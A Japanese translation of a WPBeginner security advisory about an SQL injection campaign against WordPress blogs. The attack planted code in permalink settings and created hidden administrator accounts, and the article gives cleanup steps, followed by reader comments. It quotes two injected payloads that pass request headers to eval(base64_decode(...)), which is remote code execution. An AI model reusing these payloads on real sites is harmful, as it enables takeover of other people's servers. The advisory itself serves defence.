WPBeginner - 初心者向けWordPressチュートリアル

最も必要とされている時に、信頼できるWordPressチュートリアルを。
WordPress入門ガイド
WPBカップ
2500万人以上
当社のプラグインを使用しているウェブサイト
16+
WordPress経験年数
3000+
専門家によるWordPressチュートリアル

WordPress SQLインジェクション – 最新の攻撃

編集スタッフ | | 読者開示

共有数 2 ChatGPT Perplexity X LinkedIn WhatsApp

最近、コードがサイトに注入されるSQL攻撃を受けているサイトが多くあります。このMySQLインジェクションは、パーマリンクを無効にすることで影響を与えます。その結果、ブログ投稿のURLが機能しなくなります。この攻撃では多数のWordPressブログが標的となりました。この件を私たちに知らせてくれたAndy Sowardに感謝します。

この攻撃により、パーマリンク構造に追加されたコードのいずれかが存在していました:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

これらの引用符はサイト上のすべてのパーマリンクに追加され、手動で削除しない限り変更できません。

これを修正するには、以下に移動してください。

設定 > パーマリンクに移動し、上記のコードを削除して、デフォルトコードに置き換えてください。

次にやるべきことは、ユーザーに移動することです。複数の管理者がいることがわかります。名前は表示されませんが、カウントが増加していることがわかります。したがって、やるべきことは、すべてのユーザーを見て、最後に登録したユーザーを見つけることです。そのユーザーの上にマウスを置いてリンクを取得します。コードのuserid=を、その数字に1を追加して変更します。たとえば、表示できる最後のユーザーがユーザー番号2だった場合、それに1を追加して3にします。隠された管理者は、最初の名前として奇妙なコードを持っているはずです。そのコードを削除し、購読者に設定します。その後戻って削除します。

これで問題が解決するはずです。PHPMyAdminにアクセスして、ユーザーを削除することもできます。そこにユーザーが表示されるからです。

できるだけ早くこのニュースを広めたいので、ユーザーは最新情報を得ることができます。ブログが感染していないことを確認してください。WordPressがすぐにリリースされることを願っています。

また、WordPress管理画面を保護するために、これらの対策の一部をまだ実装していない場合。

WPBeginnerで現在人気があります

開示: 当社のコンテンツは読者によってサポートされています。これは、一部のリンクをクリックすると、手数料が発生する可能性があることを意味します。WPBeginnerがどのように資金調達されているか、なぜそれが重要なのか、そしてどのように私たちをサポートできるかを確認してください。こちらが当社の編集プロセスです。

究極のWordPressツールキット

無料のツールキットにアクセスしましょう - すべてのプロフェッショナルが持つべきWordPress関連の製品とリソースのコレクションです!

今すぐダウンロード

読者とのインタラクション

8件のコメント返信する

  1. 私のウェブサイトのデータベースは数日前にインジェクションされ、各投稿またはページのURLの後に奇妙な文字や単語が追加されました。設定:パーマリンクやユーザーメニューに何も奇妙なものが見つかりませんでした。この問題を解決するにはどうすればよいですか?私のホスティング会社は、感染したデータベースのバックアップも持っています!

    返信する

  2. これに2回やられました。

    初めての時はwasupプラグインのSQLインジェクションでしたが、今回はよくわかりません。ホスティングプロバイダーにブロックされました。

    アカウントが復旧したらWordPressを削除します。もううんざりです!

    返信する

    • このコメントは大変感謝しております。問題はWP Super Cacheではなく、WP External Linkというプラグインが原因だと考えています。WP-Super Cacheを2回アンインストールして再インストールしましたが、その後、すべてが正常に機能していた開発サーバーと比較しました。違いはこのプラグインでした。そのプラグインを削除すると機能しました。これでその投稿を読むことができます。

      返信する

      管理者

      • おそらくWP External LinkとSuper Cacheの競合でした…
        上記に貼り付けたWP-Super-Cacheのhtmlコメントはhtmlコメントとして機能し、見えなくなります :) テキストは「Page not cached by WP Super Cache. No closing HTML tag. Check your theme」でした。
        したがって、最新のSuper Cacheバージョンではhtmlの有効性チェックを行わないことを約束しています。

        ああ、読んでいます!
        どうもありがとうございます!

        返信する

返信する

コメントいただきありがとうございます。すべてのコメントは、コメントポリシーに従ってモデレーションされ、メールアドレスは公開されません。名前フィールドにキーワードを使用しないでください。個人的で意味のある会話をしましょう。

Copyright © 2009 - 2026 WPBeginner LLC. All Rights Reserved. WPBeginner® は登録商標です。

管理元:Awesome Motive | SiteGroundによるWordPressホスティング

WordPress® の商標は WordPress Foundation の知的財産です。このウェブサイトでの WordPress® およびその名称の使用は、識別目的のみであり、WordPress Foundation による承認を意味するものではありません。WPBeginner は WordPress Foundation によって承認、所有、または提携されていません。

私は…について助けが必要です

人気の検索:

ブログの始め方 WordPress SEO WordPressのパフォーマンス WordPressのエラー WordPressセキュリティ オンラインストアの構築